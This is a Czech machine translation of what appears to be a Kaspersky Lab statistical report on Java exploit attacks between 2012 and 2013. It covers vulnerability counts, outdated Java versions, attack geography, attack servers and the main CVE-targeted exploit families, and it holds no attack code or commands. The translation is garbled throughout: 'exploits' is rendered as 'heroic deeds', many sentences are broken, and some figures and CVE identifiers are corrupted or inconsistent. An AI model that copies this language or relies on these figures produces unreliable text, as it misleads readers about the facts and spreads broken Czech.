Využije stále představují hrozbu, i když je uživatel vědom nebezpečí, které představují, se dobře orientuje v oblasti bezpečnosti IT a dilligently udržuje jejich aktualizovaný software. Je to proto, že když se objevil zranitelnost může trvat týdny, dokud se náplast uvolní opravit. Během této doby hrdinské činy byly schopny fungovat svobodně a ohrozit bezpečnost téměř všech internetových uživatelů. Toto riziko lze výrazně snížit, pokud uživatelé mají vysoce kvalitní bezpečnostní řešení na svých počítačích nainstalovanou, včetně technologie dokáže blokovat útoky vedenými využije.
Využije jsou speciální programy, které využívají zranitelnosti populární software využívají miliony lidí po celém světě.
Při vývoji řešení pro vysoce kvalitní bezpečnostní pro domácí i firemní zákazníky, společnost Kaspersky Lab neustále sleduje cyberthreats krajiny. To pomáhá společnosti Kaspersky Lab odborníci pravidelně zlepšovat technologie ochrany a posílení bezpečnosti proti nejnaléhavějších hrozeb. Spolu s dalšími prostředky, obsahuje analýzu dat, získaných z Kaspersky Security Network - cloud infrastruktury, která spojuje více než 60 milionů uživatelů Kaspersky Lab na celém světě a poskytuje informace, které jsou nezbytné ke sledování situace v oblasti cyberthreats pravidelně.
Údaje, získané od společnosti Kaspersky Security Network, sloužil jako základ pro dřívější zprávě společnosti Kaspersky Lab, s názvem " Posouzení hrozeb úrovně softwarového zabezpečení ", ve kterém společnost experti analyzovali situaci obklopující nejrozšířenější legální software. Ukázalo se, že velké množství uživatelů neaktualizují zranitelné verze rizikových aplikací, dokonce i týdny poté, co byla zveřejněna nějaká aktualizace. Zpráva také identifikovala nejčastější cíle pro využívání útoků: Oracle Java software prostředí, multimediální obsah displeje aplikace Adobe Flash Player a jeho sestra produkt Adobe Reader, který se používá pro prohlížení souborů PDF.
V naší nové studii jsme se rozhodli zaměřit se na Oracle Java. Tato volba odráží obrovský nárůst útoků na tento produkt v minulém roce, jak je uvedeno v tabulce níže.
Rychlé Q & A o Javě
Co je Java?
Java je objektově orientovaný programovací jazyk, který umožňuje poměrně rychlé a snadné vytvořit multiplatformní multimediální prvky, včetně aplikací, které lze spustit na libovolné virtuální stroj Java, bez ohledu na architektuře počítače. Jinými slovy, nejsou potřeba přepsat aplikační pokaždé, když narazí na nový operační systém nebo prohlížeč. Hlavním požadavkem je stávající verze virtuálního stroje Javy pro tento operační systém a prohlížeč. To dělal nástroj Java velmi populární mezi vývojáři webových stránek a software pro různá zařízení.
Proč existuje tolik chyb v Javě?
Za prvé, vývoj Java začala, když škodlivými útoky prostřednictvím zranitelnosti byly prakticky neexistující. Jako výsledek, vývojáři softwaru obecně - nejen ty, kteří pracují na Javě - nemohli předvídat tuto potenciální bezpečnostní riziko, a software nebyl postaven s ohledem na bezpečnost.
Za druhé, velký počet zjištěných chyb v Javě potvrzuje velké množství odborníků speciálně hledají těmito chybami. Podle majitele Oracle, Java, je-li přípravek používán na více než 3 miliardy různých zařízeních po celém světě. Toto rozlehlé publikum, které je jedním z klíčových parametrů, které vedou počítačoví zločinci, když vybírají cíl jejich útoků. Čím více lidí používá určitý výrobek, tím větší je pravděpodobnost, že se zločinci mohou nezákonně obohacovali.
Proto, Java nelze považovat za nejzranitelnější softwarové platformy - ve skutečnosti zločinci jsou prostě vědomi toho, že miliony lidí používat tento produkt a cítí, že to dává smysl utrácet prostředky na hledání způsobů, jak využít této situace.
Co je to exploit balení?
Je nelegální software balíček, který obsahuje ovládací panel a sadu využije určených pro řadu legitimních aplikací. Exploit balení jsou podobné sadu klíčů, ale tady každá "klíč" je samostatný exploit, který se spouští v závislosti na tom, jaký software je oběť pomocí. Využije zranitelnosti Java mohou být také použity samostatně z exploit balení. Oni jsou také vidět, například v cílených útoků, kde zločinci připraví detekci chyb v cílovém IT infrastruktury a vytvořit webovou stránku, která sídlí exploit Java.
Jak jsou útoky pomocí Java využívá provádí?
Typicky počítačoví zločinci nalákat uživatele na speciálně navržené webové stránky, které hostí vhodný výběr využije. Když uživatel načte stránku, vestavěný modul identifikuje, který prohlížeč je v provozu a které Java-plugin verze jsou instalovány. Na základě těchto údajů exploit je vybrán, a to automaticky načte jeho škodlivého kódu do počítače.
Metodika zprávy: Co a jak se počítá
Pro tuto studii jsme použili informace získané z více než 40 milionů uživatelů produkty společnosti Kaspersky Lab na celém světě, kteří souhlas k poskytnutí statistických údajů společnosti Kaspersky Security Network. Tato data pocházejí z počítačů, které obsahují jakoukoli verzi softwaru Oracle Java. Zpráva obsahuje statistické údaje ze čtyř modulů antivirové ochrany používané v produktech společnosti Kaspersky Lab: web antivirového souboru antivirus, heuristická analýza a automatické Exploit Prevention modul.
Sledované období studia:
Vybrali jsme si dat shromážděných během 12 měsíců od září 2012 do srpna 2013. Těchto 12 měsíců je zvláště zajímavé, protože z poměrně velkého počtu chyb zjištěných v Javě - dvakrát tolik jako v předchozím období 12 měsíců. Chcete-li zvýraznit tuto změnu jsme se rozdělili toto období na dvě poloviny: září 2012 do února 2013 od březen do srpna 2013.
Předmětem studie:
Počet chyb v Javě a jejich povaze;
Počet útoků exploit Java a jejich dynamika;
Počet unikátních uživatelů pod útokem, a jejich dynamika;
Rozdělení útoků a individuálních uživatelů podle zeměpisné polohy;
Počet a převaha "sofistikovaných" útoků, zjištěné pomocí Kaspersky Lab jedinečnou Automatické Exploit Prevention
Rozsah distribuce využije vyvinut pro vulerabilities zjištěných ve sledovaném období.
Hlavní zjištění
Studie ukázala, že Oracle a její uživatelé museli velmi obtížná 12 měsíců, čelí obrovské množství útoků.
Více než 160 zranitelnosti, šest z nich kritické, byly zjištěny v softwaru Java různými společnostmi a kybernetické odborníků;
Kaspersky Lab zjištěn více než 14.100.000 útoků, které používají Java využije. To je 33,3% více než v předchozích 12 měsíců.
Počet útoků zvýšil v průběhu celého roku. Od března-srpen 2013 více než 8.540.000 útoky byly zjištěny, a to až 52,7% v předchozích šesti měsících.
Celkem bylo více než 3.570.000 uživatelů aplikací společnosti Kaspersky Lab řešení zaútočil na celém světě v průběhu 12 měsíců sledovaného období.
Ve druhé polovině roku se počet napadených uživatelů bylo o 21% ve srovnání s prvním pololetím a přišel do 2.000.000 unikátních uživatelů.
Asi 80% útoků byly soustředěny v pouhých 10 zemích. Většina z nich byly spáchány v USA, Rusku, Německu a Itálii.
Kanada, USA, Německu a Brazílii byly země s nejrychleji rostoucím počtem útoků. Spolu s Francií tyto země mají také nejrychleji rostoucí počet unikátních uživatelů pod útokem.
V blízkosti 50% útoků používá jen šest skupin využije.
V průběhu posledních 12 měsíců Kaspersky Lab Automatické Exploit Prevention blokován 4200000 "sofistikované" útoků, zaměřených na více než 2 miliony uživatelů.
Samozřejmě, tyto trendy mají své vlastní pecularities. Budeme studovat podrobněji.
Část 1: rok zranitelnosti v Javě
Doba se tato zpráva se ukázalo, že je velmi náročný na Java Oracle, pokud jde o neopravených chyb. Během této doby, byla 161 chyby zjištěny v různých verzích Java. Většina z nich byla ve verzích 1.5, 1.6 a 1.7, které jsou nejrozšířenější verze softwaru. Pro srovnání: ve stejném období v letech 2011-2012 bylo hlášeno jen 51 unpatched zranitelností.
Podklady použité pro výpočet níže uvedený graf pochází z dánské firmy Secunia, která agreguje data o zranitelnosti zjištěné v legitimní software. Jak je vidět z grafu, Secunia vydala osm doporučení a upozornění v tomto období (každá oznámil odhalení zranitelnosti Java), a některé z nich se zabýval tolik jako 40 nových hlášených chyb. Během stejného období 2011-2012, bylo vydáno pět Secunia upozornění.
Červené pruhy označují uvolňování jednoho nebo více doporučení a upozornění Secunia oznamující detekci kritických zranitelností. Pouze dvě doporučení a upozornění (zelené pruhy) neobsahovalo žádné kritické chyby. Zdroj: Secunia.
Je třeba zdůraznit, že drtivá většina chyb nalezených v Javě nepředstavují velkou hrozbu. Ale ve stejnou dobu, šest z těchto rad řešena alespoň jednu chybu, která by mohla vést k infekci počítače. Celkem jen dvě upozornění publikované od září 2012 a srpnem 2013 nevykazovala kritické chyby - zprávy otázky dne 20. února a 19. června. Během této doby společnost Kaspersky Lab zdůraznila šest nejnebezpečnější Java zranitelnosti lodě a "učí" své antivirové technologie reagovat na šesti Exploit rodin zaměřených na tyto chyby.
Chcete-li úvěr Oracle, všichni kritických chyb zjištěných během tohoto období již oprava v době, kdy tato zpráva byla napsána. Nejnovější verze Java (1.7) byla vydána v červnu tohoto roku (Update 25), když verze 1.6 (aktualizace 51) byl nejvíce převládající.
Bohužel Kaspersky Lab statistiky - což nám pomáhá získat úplnější obraz o tom, které verze lidí Java používáte v počítačích se systémem Kaspersky Lab bezpečnostní produkty - nepotvrzují, že všichni uživatelé jsou chráněny proti útokům Exploit po aktualizaci je propuštěn.
Jeden a půl měsíce po vydání nejnovější verze Javy, většina lidí stále používají zranitelné verze softwaru.
Tento koláčový graf byl sestaven na základě údajů z 26820000 jednotlivým uživatelům aplikace Kaspersky Security Network oznámení o použití jakékoliv verzi Java na svých osobních počítačích. Zdroj (zde a níže): Kaspersky Security Network.
Méně než polovina (42,5%) všech uživatelů Java aplikace Kaspersky Security Network nainstalovali aktualizaci na nejnovější verzi Java. Více než 15% (nebo více než 4 miliony uživatelů) používáte předchozí verzi SE7 U21, který byl propuštěn v polovině dubna. Zhruba 1,3 milionu uživatelů (4.93%) stále používáte SE7 U17, který byl propuštěn již v březnu 2013.
Pozoruhodné je, že SE 6 U37 - povolená záda v říjnu 2012 - byl poslední verze Javy 1.6 v Top 10 nejčastěji používaných verzí.
Závěry jsou zřejmé: jeden a půl měsíce po vydání nejnovější verze Javy, většina uživatelů stále pracují s ohroženými verzemi.
Tato situace stane znovu a znovu. Na konci června, necelé dva týdny poté, co byl propuštěn Aktualizace 25. pouhých 291 tisíc uživatelů uvedla, že používáte nejvíce up-to-date verzi. Bylo málo času na mnoha uživatelům aktualizovat jejich software, ale hrozivější do konce června jsme ještě viděli téměř dvakrát tolik lidí, kteří používají zranitelné zastaralé verze U17 jako novější U21 verze vydané v polovině dubna. Počet lidí, kteří používají U21 byl 3,5 mil. Kč a počet lidí, kteří stále používají zastaralé a zranitelné SE U17 byl více než 6 milionů.
Analýza odhaluje předchozím období ve stejné situaci. Většina uživatelů se pracovat s jazykem Java, které jsou 2-3 generace starší, než většina up-to-date verze v době výzkumu.
Ve stejné době, když tento trend je nebezpečné, ale také ukazuje některé pozitivní signály. Srovnáme-li pět nejpoužívanější verzí Javy v srpnu se stejnými daty z konce června, pak můžeme vidět, že s podobným počtem jednotlivých uživatelů (18.650.000 v srpnu a 19,7 milionů v červnu), počet uživatelů používajících nejvíce up-to-date verzi Javy v srpnu byl výrazně vyšší než v červnu.
Níže uvedený graf znázorňuje procentuální podíl uživatelů používajících Top 5 verzí Javy v červnu.
Protože tam byl relativně krátkou dobu (méně než dva týdny) od vydání nejnovější verze (U25) a shromažďování údajů pro tuto zprávu, "poslední" verze používá pro účely této analýzy bylo U21. Jak graf jasně ukazuje, pouze 17,85% uživatelů běhali danou verzi Javy, zatímco většina lidí (téměř jedna třetina) byly pomocí zastaralý a zranitelné U17.
V srpnu jsme zaznamenali mnohem povzbudivý trend.
Jinými slovy, v létě, Java uživatelé objevila mnohem více ochotni aktualizovat na nejnovější verzi softwaru, než na jaře. Je obtížné určit přesné důvody tohoto zrychlení v procesu aktualizace. Je možné, že hromadné sdělovací prostředky pokrytí detekce zranitelnosti Java vyzváni, aby lidé jednat - tam bylo mnoho příběhů tohoto typu ve zprávách po celé jaro roku 2013. Jak je uvedeno v naší další analýze, letos na jaře se ukázalo být velmi náročné období pro Javu, zejména pokud se domníváte, že počet útoků a číslo cílové uživatele.
Část 2: Rok útoků na uživatele Java
Stabilní nárůstu útoků
V průběhu 12 měsíců od září 2012 do srpna 2013 Kaspersky Lab nahrál přes 14.100.000 útoky vedené proti uživatelům po celém světě. Ve srovnání se stejným obdobím v roce 2011-2012 se počet útoků zvýšil o 33,3%.
Zároveň, pokud se zlomit, že 12-měsíční rozpětí do dvou šestiměsíčních období, dynamika jsou ještě výraznější. Tam byl 52,7% nárůst počtu útoků v druhé polovině roku - 8540000 od března do srpna 2013 ve srovnání s 5.590.000 v předchozích šesti měsících. Dynamika útoků během posledních 12 měsíců:
Na začátku tohoto období, viděli jsme stabilní počet útoků během podzimních měsíců, a slabý klesající trend v prosinci. Pak se na začátku ledna jsme viděli ostrý nárůst, vrcholit v polovině měsíce a následuje podobně dramatickým poklesem.
Ve srovnání se stejným obdobím v roce 2011-2012 se počet útoků v letech 2012-2013 zvýšil o 33,3%.
Od února a do konce května, počet útoků rychle rostla. Byl to výsledek, mimo jiné, detekce všech nových zranitelností v Javě (87 zranitelností v únoru až květnu, z nichž tři byly hodnoceny jako kritické) a pomalým přechod mezi uživateli Java záplatami, bezpečnější verze.
Od června do srpna, jsme pozorovali trvalý pokles počtu útoků. V polovině června Oracle vydal novou verzi Javy, který byl pozdraven s aktivnějším přechodu na aktuální verzi, jak je popsáno v předchozí části této zprávy. Letní dovolená sezóna je tradičně pomalý, pokud jde o cybercriminal činnosti, což je další faktor, aby zvážila.
Kromě počtu útoků v průběhu roku, se počet uživatelů, kteří se vyskytly tyto útoky také zvýšil.
Další uživatelé v hledáčku
V uplynulém roce více než 14 milionů útoky cílené 3.750.000 uživatelů 226 zemích. Během prvních šesti měsíců roku 1,7 milionu jednotliví uživatelé čelili útokům zahrnující Java využije, ve srovnání s více než 2 miliony v příštích šesti měsících. Toto zvýšení března do srpna bylo přes 21% ve srovnání s předchozími šesti měsíců.
Počet uživatelů napadených v průběhu celého roku měnit v souladu s počtem útoků samotných. V zářím-únorem, průměrná intenzita přišel do 3,29 útokům na uživatele, zatímco březnu-srpnem, že číslo bylo 4,15. Z jedné poloviny do následujícího roku, intenzita útoků se zvýšil o 26,1%. V průměru se v průběhu roku, každý uživatel se setkali 3,72 útoky. Jak jsme oslovili výše, nejrušnější období a to jak v počtu útoků a počet cílených uživatelů byla jaro 2013.
Drtivá většina cílové uživatele (zhruba 79,6%) žije v pouhých 10 zemích a 10 zemí představoval drtivou většinu útoků (82,2%).
Pozoruhodné je, nicméně, po "pružiny probuzení," počet útoků klesl rychleji, než je počet postižených uživatelů. Například v červnu počet útoků ve srovnání s květnem klesla o 21,9%, zatímco počet napadených uživatelů se snížil o 15,5%. Je možné, že Oracle uvolnění U25 aktualizace hrál hlavní roli v tomto vývoji, protože by to znamenalo až záplatování kritických zranitelných míst v softwaru Java. Vzhledem k poklesu počtu uživatelů zranitelných verzí Javy by kybernetické crimnals přijaly opatření k přilákání více nových jednotlivé uživatele na nebezpečné webové servery. Logika je jednoduchá: čím více uživatelů tam jsou, tím větší je pravděpodobnost, že někdo bude mít zastaralou verzi Javy.
Obecně platí, že tyto výkyvy v počtu útoků a počet obětí znepokojující. Obě čísla výrazně vzrostly v uplynulém roce. Avšak kromě změn v dynamice celkového počtu útoků, viděli jsme také některé další kuriózní trendy v jejich distribuci v jednotlivých zemích v průběhu posledních 12 měsíců.
Část 3: Mezinárodní hrozba - geografie útoků uživatelů a zdrojů
Geografie útoků - deset velkých obětí
Jedním z nejzajímavějších výsledků této části studie je fakt, že drtivá většina napadených uživatelů (o 79,6%) žije v 10 zemích světa. Drtivá většina útoků (82,2%) došlo také v těchto deseti států.
Výše uvedená tabulka ukazuje USA na prvním místě, obdrží 26,17% všech útoků. Rusko je na druhém místě s 24,53% a v Německu (11,67%) je na třetím místě. Mezitím seznam nejvíce napadených zemí změnila v průběhu roku.
V březnu a srpnu 2013 USA a Rusko si vyměnili místa. Útoky v USA vzrostl z 21,44% na 29,26%. Útoky na ruských uživatelů klesl 6,82 procentního bodu na 21,83%.
V Kanadě se počet útoků zvýšil o více než 118% a dosáhl 0,24 milionu, v Brazílii vzrostl o 72% (0,22 milionu útoky). Počet případů ve Velké Británii vzrostl o 51%, ve druhé polovině roku bylo zjištěno více než 0.250.000 útoky.
Německá "příspěvek" ke společnému útoku obrázku zvýšil výrazně - o 1,95 procentního bodu. Jiné země také vykázaly růst. Nejen Ukrajinu je podíl klesl - o 1 procentní bod, od 3,38% do 2,38%. Sazby jiných zemí liší jen nepatrně.
Celkově to vypadá takto:
V období od března do srpna USA čelil dvakrát tolik útoků - 2500000 ve srovnání s 1,19 miliony útoků v posledních 6 měsících. V březnu 08. 2013 bylo více než milion útoky detekovány v Německu, zatímco v období od září do února bylo 0.580.000. Obecně platí, že USA, Rusko a Německo jsou vedoucími zeměmi z hlediska počtu útoků. Nicméně, dynamika růstu mezi lídry značně liší.
V Kanadě počet útoků zvýšil o více než 118% na 0.240.000, v Brazílii byl nárůst o téměř 72% na 0220000 útokům. Počet případů ve Velké Británii vzrostl o 51%, ve druhé polovině roku bylo zjištěno více než 0.250.000 útoků. Nejnižší nárůst byl zaznamenán v Rusku, Španělsku a na Ukrajině.
Není divu, protože počet útoků roste i počet uživatelů, kterým čelí útoku. Ratingy vedoucích zemí jsou podobné: téměř polovina všech uživatelů napadl během období výzkumu (48,27%) žijí v Rusku a USA. Každý desátý oběť žije v Německu.
Z hlediska intenzity útoků na jednotlivé uživatele, vůdcové jsou Brazílie a USA - během sledovaného období tyto země, respektive 5,75 a 4,79 viděli útoky na uživatele, což je výrazně vyšší než průměrná hodnocení pro jiné země. Německo je třetí s 4,04 útoky na uživatele, a Itálie přišel čtvrtém místě s 3,82.
Top 10 zemí podle intenzity útoku jsou:
Země Útoky na uživatele %
Brazílie 5.75 9.01%
Spojené státy 4.79 9.72%
Německo 4.04 11.83%
Francie 3.65 12.10%
Kanada 3.58 12.78%
Španělsko 3.42 13.94%
Spojené království 3.39 14.22%
Ruská federace 3.32 14.47%
Ukrajina 3.04 14.55%
Proč je intenzita útoků roste? Velký počet chyb zjištěných v Javě a uživatele, kteří nevšímejte si aktualizace softwaru vytvořit ideální podmínky pro počítačové zločince zahájit intenzivnější útoky.
Téměř polovina všech napadených uživatelů za dané období (48.27%) žije v Rusku a USA.
Když se dozvěděl, kdo byl nejčastěji napaden a kde budeme nyní analyzovat informace o zdrojích těchto útoků získat lepší pochopení problému.
Zdroje útoků - noví hráči jsou
Výrazným detailem na zeměpisné poloze mnoha útočných zdrojů - serverů, v Prostě - je skutečnost, že země hosting těchto serverů jsou často daleko od zemí, které jsou na přijímací straně útoků.
Celkem bylo v průběhu roku 1210000 unikátních útok zdroje zjištěn v 95 zemích. Více než polovina z nich se nachází v USA, Německu a Rusku.
Od zářím-února Kaspersky Security Network zjištěna 0410000 škodlivé servery umístěné v 86 zemích.
Od března do srpna Kaspersky Security Network shromažďují informace o 0,8 milionu škodlivých serverech ve 78 zemích. Celkový růst v útoku zdrojů 95,2%.
Nicméně, nejvíce zajímavá věc tady není, že počet zdrojů zdvojnásobil ve lhůtě šesti měsíců, ale skutečnost, top 10 zemí dramaticky změnila. Německé čísla klesly o více než trojnásobně z 36,82% na 10,59%, tlačí dolů na třetí místo v druhé polovině roku. Rusko zůstalo na druhém místě a jeho postavy se příliš nezměnilo - 19,57% od září do března a 18,40% od března do srpna.
Německo a USA vyměnili místa. V první polovině roku byly pouze 12,99% útočných zdrojů nachází ve Spojených státech, v druhé polovině tohoto vzrostla na 31,14%
Celkem po 12 měsících studia Top 10 zemí, které slouží jako zdroj útoku jsou následující:
Celkem bylo v průběhu roku 1210000 unikátních útok zdroje identifikovány v 95 zemích. Více než polovina z nich - 63,06% - se nachází v USA, Německu a Rusku. Další významné zdroje Exploit útoků lze nalézt v Nizozemsku (7,48%), Spojeném království (5,1%), České republice (3,66%), Francie (2,93%), Kanadě (2,47%) a Lucembursku (1,72%) . Zbývajících 10% zdrojů se nachází v 85 dalších zemích.
USA ukazuje silnou a stabilní nárůst počtu útoků zdrojů s počty zvyšuje od února a vrcholit v červenci.
Je zarážející, že některé země jsou vysoce hodnocené mezi "útočníky", ale nejsou mezi nejvýznamnější obětí. To by mohlo být připojeno k skutečnosti tyto země - likes Nizozemí, České republice, Lotyšsku a Lucembursku - nejsou považovány jako vysoce rizikové adresy pro zločinci, so hosting poskytovatele jsou méně pravděpodobné, že reagovat na stížnosti na nebezpečné stránky hostované na tyto servery. Samozřejmě, že tyto společnosti lze nalézt v mnoha dalších zemích, ale čísla jsou větší v zemích uvedených výše.
V průběhu roku útok zdroje změnily takto:
Na začátku sledovaného období bylo Německo konzistentní vůdce, i když počet útočných zdrojů klesl na rozdíl od špice mezi lednem a březnem. USA ukázal, rovnoměrného a největší nárůst počtu útoků zdrojů, horolezectví od února a vrcholit v červenci. V březnu se počet škodlivých serverů umístěných v Rusku prudce vzrostla. Je zajímavé, že na konci období studia tři členové Top 5 - Rusko, Německo a Nizozemsko - se má klesající tendenci, zatímco množství škodlivých serverů v USA a ve Velké Británii rostla. Ovšem stejně jako v níže uvedené tabulce, se však nemají zásadní vliv na celkový počet škodlivých serverů. Jak s útoky a napadení uživatelů, počet serverů klesly v průběhu léta.
Výše uvedená tabulka ukazuje korelaci počtu útoků napadl uživatele a servery, ze kterých byly pokusy o stažení využije.
V průměru, v průběhu roku 11,64 pokusí stáhnout exploit, byly vyrobeny z každého z více než 1,2 milionu unikátních zjištěné IP adresy.
Je to hodně? Za prvé, měli bychom vzít v úvahu tyto hodnoty platí pouze pro společnosti Kaspersky Lab uživatele, kteří se setkali takové stránky. Ve skutečnosti by mohlo být mnohem více stažení z každé IP adresy. Za druhé, exploity jsou velmi nebezpečný typ malware. Úspěšné stažení může vést k vážnému poškození, včetně finančních ztrát. Jinými slovy, škody způsobené útoky prováděné s exploity jsou nepřiměřené svým poměrně malým počtem.
Když už mluvíme o samotných útoků, během sledovaného období bylo jen šest kritické chyby zjištěny v Javě. Mohl by se opravdu vážně poškodit nechráněné uživatelů? Podíváme se na to podrobněji v další části zprávy.
Část 4: Bližší pohled na činů "v přírodě"
V průběhu sledovaného období produktŧ společnosti Kaspersky Lab zjištěn 2047 různých škodlivých rodiny byly zařazeny mezi využije. Nicméně - a to je typické - jen devět z těchto rodin tvoří většinu útoků, které byly zahájeny.
Zhruba 81% všech útoků byly zahájeny od pouhých 9 exploit rodin zaměřené 9 zranitelnosti.
Exploit.Java.Generic podpis znamená, že Kaspersky Lab cloud technologie zabezpečení zjistil chování, které je typické zneužití, ale v té době, že statistiky byly připraveny, byly tyto Nálezy nezjištěné v podmínkách, které Java zranitelnost byli cílení. Jen přes 2 miliony takové detekce byly zaznamenány během vykazovaného období.
Níže uvedená tabulka je dalším příkladem smutné stavu aktualizací ohrožených programů. Více než 50% zjištěných zpracovaných Kaspersky Lab technologie pochází z hrdinských zaměřené speciálně na chyby, které byly objeveny v roce 2012. V roce 2013 představovaly asi 13,61% útoků.
Dalo by se předpokládat, že souhrnné statistiky za posledních 12 měsíců není opravdu dát jasný obraz o situaci, protože tyto hrdinské činy byly navrženy tak, aby cílové chyby, které nebyly patch v roce 2012 a měl více času na šíření. Ve skutečnosti, pokud porušíte čísla se v srpnu 2013 je zřejmé, že unpatched využije v roce 2013 byl zodpovědný za mnohem větší počet útoků v posledním měsíci léta, než byly v průběhu roku v průměru.
Nicméně, pokud jste se podívat na Top 10 využije za tentýž měsíc, situace vypadá jinak.
CVE-2012-1723 je stále lídrem mezi identifikovaných využije. První veřejné oznámení o této chybě došlo v červnu 2012. Oracle vydal patch jen o několik dní později. Jak můžete vidět z grafu více než o rok později 20% útoků i nadále zahrnovat CVE-2012-1723.
Více než 50% z odhalení zpracovaných Kaspersky Lab technologií dobu 12 měsíců účastní zneužití chyby zabezpečení, které byly zaměřené na unpatched v roce 2012. Chyby zjištěna v roce 2012 odpovídat za zhruba 13,61%.
Nicméně, jak jsme již zmínili výše, v průběhu vykazovaného období, bylo zjištěno šest nových kritických zranitelností. To je, jak se krajina útoků se měnila i nové díry v zabezpečení Java jsou detekovány.
Řádky v tabulce představují využít vedené útoky registrovány v průběhu roku
Dynamika útoky zasahující exploity, které se objevily v průběhu vykazovaného období připomínají závodě štafet. Jak se počet útoků zaměřených na jednu chybu začne padat, nový vzniká, a využije cílení že jednou převezme štafetu a v čele závodu. Tato tabulka také ukazuje, jak byla CVE-2012-4681 zapojen do útoků. To zejména činem byl zjištěn pouhé tři dny před uplynutím lhůty se vztahuje tato studie začala, a byl Zero Day typu zranitelnost představuje zásadní hrozbu. Přestože Oracle dělal uvolnění nouzového náplast dne 30. srpna 2012 graf ukazuje, že i po mírném poklesu v počtu útoků v říjnu, to bylo lezení zálohovat grafu konci listopadu.
Využít zaměření CVE-2012-5076 byl objeven v polovině října 2012 a vzal štafetu od CVE-2012-4681. To se okamžitě staly populární mezi zločinci, protože je schopen infikovat několik verzí Javy. Ačkoli místo pro zranitelnost byla vydána v témže měsíci v březnu 2013 byl tento exploit stále uveden na Blackhole , jeden z nejčastějších Exploit balení na černém trhu, protože se mohou zaměřovat na širokou škálu verzí a infikuje oběti spolehlivěji .
CVE-2013-0422 je dalším Zero Day zranitelnost, která byla objevena letos v lednu. Patch byl propuštěn rychle, ale počet útoků zvýšil, a to až do února. Poté, pokles počtu útoků začal zpomalovat, a usadil se v na úrovni 25,000 detekcí za měsíc až do srpna. Stejně jako jeho předchůdce, byl tento exploit uveden na Blackhole spolu s dalšími známými exploit balení. CVE-2013-0422 spolu s CVE-2012-1723 byly použity v Icefog špionážní kampani objevil Kaspersky Lab vědci nedávno.
CVE-2013-0431 zranitelnost, která se objevila na počátku února, byl aktivně používán, včetně gangem počítačoví zločinci šíření Reveton , scareware Trojan. Toto programové bloky počítače oběti a zobrazí se zpráva údajně od FBI o tom, že uživatel porušil zákon a musí zaplatit pokutu. Skupina stojící za těmito typy útoků byl zatčen španělskou policií na začátku února 2013 když to nezabránilo šíření tohoto Trojan. V polovině února se objevily informace on-line o počítač infikován Reveton po útoku zahrnující využije zaměřené CVE-2012 až 0431.
CVE-2013-1493 zranitelnost, která se objevila na začátku března byl také terčem útoků, které byly většinou zaměřené na průmyslovou špionáž. Konkrétně, podle údajů z nezávislých studií, škodlivý program, který byl nainstalován po činem byl spuštěn spojen s uživateli se zlými úmysly serveru na stejné IP adresy jako C & C server používaný při útoku proti Bit9 v únoru letošního roku.
V absolutním vyjádření útoky zahrnující šest rodin využije představovat nejméně 47,95% z celkového počtu exploit útoků. To je téměř polovina všech útoků exploit Java zjištěných produkty společnosti Kaspersky Lab.
Využije zaměřené CVE-2013-2423, který byl zjištěn v červnu 2013 byly nalezeny odborníky společnosti Kaspersky Lab, které mají být zapojeny do útoků proti uživatelům Apple. To je si myslel, že tyto útoky byly zahájeny v rámci kampaně proti návštěvníků na internetových stránkách vlády exilové tibetské něco Kaspersky Lab řešit dříve.
Všechna tato data je jen dalším příkladem toho, jak uživatelé se zlými úmysly využil chyb, které byly objeveny v průběhu vykazovaného období. Obecně platí, že šest zranitelností, které jsou definovány tok útoků proti Javy v září 2012 do srpna 2013.
V absolutním vyjádření, útoky na kterých se tyto rodiny představoval alespoň 47,95% z celkového počtu útoků, nebo téměř polovina všech Java využívat detekci zpracované produkty společnosti Kaspersky Lab.
Ve stejné době, více než polovina (53,17%) z celkového počtu uživatelů vystaven útokům s nimiž se setkávají alespoň jeden útok zahrnující exploit, z jednoho z těchto šesti rodin.
A to bylo 12 měsíců útoky na Javu. Nicméně předtím, než jsme se spojit výsledky této studie, dejte nám první se podívat na jen jeden nebezpečný typ útoku setkala společnosti Kaspersky Lab uživatelů během tohoto období 12 měsíců.
Část 5: Plus 4,2 milionu útoků zachycených Automatické technologií Exploit Prevention
Klíčovou postavou v této studii je, že produktŧ společnosti Kaspersky Lab blokován přes 14 milionů útoky zasahující Java využije. Ve skutečnosti, společnosti bezpečnostního systému registrováno 4.200.000 další incidenty. To je počet útoků, které byly zablokovány jeden-a-druhu společnosti Kaspersky Lab Automatické Exploit Prevention techniky. Tyto 4200000 útoky měly vliv 2250000 jednotlivých uživatelů po celém světě.
Proto jsme se rozhodli analyzovat údaje z automatického Exploit Prevention samostatně
Boj proti útokům pomocí exploitů je vícestupňový proces, ve kterém několik bezpečnostních subsystémů antivirový produkt hrají roli. První krok se odehrává na úrovni webové stránky, když bezpečnostní produkt, vedené v databázi škodlivých webových stránek, se pokouší blokovat každý uživatel přesměruje na stránky očkuje zneužít. Pokud to nepodaří odhalit hrozbu, snad proto, že webové stránky právě vytvořili, a dosud není zařazen na černou listinu, pak soubor antivirový modul zapojí. To naskenuje stránku na jakékoliv známky škodlivého kódu, na základě podpisu databáze a heuristické záznamy. Ty jsou rozšířeny s podpisy, které pomohou odhalit jako-of-přesto neznámý škodlivý kód, pomocí značek, které jsou typické známého malware. Pokud to není možné rozpoznat hrozbu, Kaspersky Lab software automaticky provést kontrolu pomocí exploitu podpis databáze. Pokud to nebude vytvářet žádné výsledky, pak aktivní exploit technologie detekce je aktivována - Automatické Exploit prevence je jednou ze složek této technologie postavené na produkty společnosti Kaspersky Lab. Můžete se dozvědět více o tom, jak bojuje proti zneužití v tomto článku publikované zranitelnosti manažer společnosti Kaspersky Lab Research Group, Vyacheslav Zakorzhevsky.
Na tomto místě bychom měli poznamenat, že v procesu neutralizace exploitu je popsáno výše, Automatická Exploit Prevention je svým způsobem jakýsi není konečná hranice bezpečnosti "Final Frontier." - Pokud z nějakého důvodu, škodlivý kód řídí dostat přes Automatické Exploit Prevention (což je velmi nepravděpodobné) a stáhnout škodlivého kódu do počítače uživatele, bude stále detekován a blokován dalšími složkami bezpečnostního produktu. Nicméně, Automatická Exploit Prevention je jedinečný v tom, že výrazně snižuje pravděpodobnost tohoto scénáře se odehrály.
